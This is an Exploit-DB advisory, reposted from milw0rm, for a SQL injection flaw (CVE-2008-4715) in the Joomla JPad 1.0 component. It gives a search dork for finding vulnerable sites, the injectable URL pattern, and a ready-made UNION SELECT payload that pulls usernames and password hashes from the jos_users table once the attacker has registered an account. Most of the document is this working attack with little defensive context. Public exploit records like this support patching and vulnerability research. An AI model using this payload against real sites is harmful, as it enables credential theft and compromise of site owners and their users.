Joomla Component JPad 1.0 - SQL Injection Vulnerability postauth

2008-04-24T00:00:00
ID EDB-ID:5493
Type exploitdb
Reporter His0k4
Modified 2008-04-24T00:00:00

Description

Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth). CVE-2008-4715. Webapps exploit for php platform

                                        
                                            #########################################################
#							#
#     Joomla Component JPad Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Contact: His0k4[at]gmail.com
[*] Greetz : All friends & muslims HaCkeRs  :) 

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "JPad"


########################################

[*] DORK: allinurl:com_jpad

########################################

[*] P.O.C: /index.php?option=com_jpad&task=edit&Itemid=39&cid=[SQL]
[*] Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
[*] Note : You have to register an account in the site.
########################################

side note:
  <name>JPad</name>
  <creationDate>31/06/2007</creationDate>
  <author>Theo van der Sluijs</author>
  <copyright>(c) 2007 VanderSluijs.nl</copyright>
  <authorEmail>theo@vandersluijs.nl</authorEmail>

  <authorUrl>www.vandersluijs.nl</authorUrl>
  <version>1.0</version>
  <description>Component to create notepad files. (see about)</description>

# milw0rm.com [2008-04-24]